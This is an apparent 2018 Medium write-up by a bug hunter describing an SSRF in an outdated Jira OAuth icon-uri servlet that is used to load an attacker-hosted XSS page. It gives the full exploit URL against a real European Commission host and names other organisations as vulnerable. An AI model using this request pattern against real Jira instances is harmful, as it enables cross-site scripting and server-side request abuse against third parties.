How I found XSS via SSRF vulnerability -Adesh Kolte

Adesh Kolte
Jun 7, 2018 · 2 min read

Hello

This is Adesh Nandkishor Kolte

First Read This Articles

After reading both articles I figure out new way to carry out the XSS attack ,discovered that due to an outdated Jira instance, I was able to exploit an SSRF vulnerability in Jira and was able to perform several actions such as bypass any firewall/protection solutions and etc

so i just tried some basics tricks with google for finding the web apps which used jira integration

got web europa

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=

so i quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And Boom i got the google page and i m like

i had uploaded xss script on my own Server http://adeshkolte.at.ua/h.html

and pasted it at the place of google.com

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://adeshkolte.at.ua/h.html

then i found many webs vulnerable for it

Motorola Solution

Mass.gov

Cambridge University Press

Stanford University

Thanks for reading

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store